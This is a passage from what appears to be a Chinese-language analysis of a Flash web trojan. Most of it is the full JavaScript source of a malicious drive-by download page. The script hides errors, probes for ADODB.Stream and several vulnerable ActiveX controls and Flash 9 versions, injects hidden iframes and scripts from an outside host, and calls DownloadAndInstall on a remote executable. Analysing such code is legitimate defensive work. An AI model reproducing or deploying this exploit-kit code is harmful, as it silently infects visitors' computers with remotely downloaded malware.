这时我们会认为这个flash网马已经失效,但是实际上我们恰恰被欺骗过去了。我们再来仔细分析一下刚才的链接地址:
http://30mm.azzwg.cn/cb/ff/flash.asp?id='+Flashver+',该链接地址里flash.asp?id='+Flashver+'这部分实际上指出的是一个swf网马下载地址,其中Flashver代表的是flash版本,那么具体真正的flash网马下载地址是什么呢?要结合所挂首恶意网址源代码来分析。以下是首恶意网址源代码内容:
<script>window.onerror=function(){return true;}</script>
<script>
try{var e;
var ado=(document.createElement("object"));
var Rising="classid";
var KV2008="Adodb.Stream";
var Kaspersky="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";
ado.setAttribute(Rising,Kaspersky);
var as=ado.createobject(KV2008,"")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http://30mm.azzwg.cn/cb/014.js></script>")}
else{
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0){
document.write('<iframe style=display:none src="http://30mm.azzwg.cn/cb/m09002.htm"></iframe>')}
var myurl="http://30mm.azzwg.cn/cb/";
try{var f;
var ourgame=new ActiveXObject("GLCHAT.GLChatCtrl.1");}
catch(f){};
finally{if(f!="[object Error]"){
document.write('<iframe style=display:none src="http://30mm.azzwg.cn/cb/lzn.htm"></iframe>')
}}
try{var j;
var SinaTV=new ActiveXObject("Downloader.DLoader.1");}
catch(j){};
finally{if(j!="[object Error]"){
document.write('<OBJECT id=Sina classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>');
Sina["DownloadAndInstall"](myurl+"sina.exe")
}}
try{var g;
var storm=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
storm=(document.createElement("object"));
ActivePerl="-1C59-4BBB-8E8";
getSpraySlide="1-6E83F82C813B";
helloworld2Address="clsid:2CACD7BB";
storm.setAttribute("classid",helloworld2Address+ActivePerl+getSpraySlide)
storm["Update"]("\Program Files\Common Files\uusee\" ,myurl+"UU.ini","",1)
}}
try{var l;
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version");}
catch(l){};
finally{if(l!="[object Error]"){
if(Flashver.indexOf("9,0,16,")>0||Flashver.indexOf("9,0,28,")>0||Flashver.indexOf("9,0,45,")>0||Flashver.indexOf("9,0,47,")>0||Flashver.indexOf("9,0,64,")>0||Flashver.indexOf("9,0,115,")>0){
document.write('<iframe style=display:none src="http://30mm.azzwg.cn/cb/ff/flash.asp?id='+Flashver+'"></iframe>');}
}}try{var h;
var Real=new ActiveXObject("IERPCtl.IERPCtl.1");}
catch(h){};
finally{if(h!="[object Error]"){
Link=new ActiveXObject("IER"+"PCtl"+".IER"+"PCtl.1");
if(Link.PlayerProperty("PRODUCTVERSION")<="6.0.14.552"){
document.write("<script src=http://30mm.azzwg.cn/cb/real.js></script>")}
else{
document.write('<iframe style=display:none src="http://30mm.azzwg.cn/cb/realn.htm"></iframe>')}
}}
try{var b;
var bfn=new ActiveXObject("MPS.StormPlayer.1");}
catch(b){};
finally{if(b!="[object Error]"){
document.write('<iframe style=display:none src="http://30mm.azzwg.cn/cb/bfn.htm"></iframe>')
}}
}}
</script>